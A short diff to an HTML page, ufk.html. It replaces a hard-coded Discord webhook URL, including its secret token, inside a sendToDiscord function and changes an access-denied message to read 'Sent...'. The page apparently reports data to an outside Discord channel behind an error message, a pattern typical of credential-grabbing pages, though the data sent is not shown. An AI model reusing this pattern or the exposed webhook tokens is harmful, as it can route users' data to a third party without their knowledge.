--- a/ufk.html
+++ b/ufk.html
@@ -85,7 +85,7 @@
         }
 
         function sendToDiscord(message) {
-            const webhookURL = 'https://discord.com/api/webhooks/1250303725835128956/hb3e4hj76bdTHUul_8q1rPMpY-C_I8wm_BIRUdjMttdhyGclXNbNbKnp2Pjztvy_mTwK';
+            const webhookURL = 'https://discord.com/api/webhooks/1289233607688458280/Iett3QC1j0B9hG2fVCEjaRy5nPG85zX5P3pnNRVxCv4EWkGEVXo2iNN_S_a0ZsnFMrqf';
             const payload = {
                 content: message
             };
@@ -145,7 +145,7 @@
     
     <!-- only if access failed, it'll show that only. -->
     <div id="accessDenied">
-        <h1><img src="img/wrong.png" width="20"> Sent.</h1>
+        <h1><img src="img/wrong.png" width="20"> Sent...</h1>
     </div>
     
 </body>
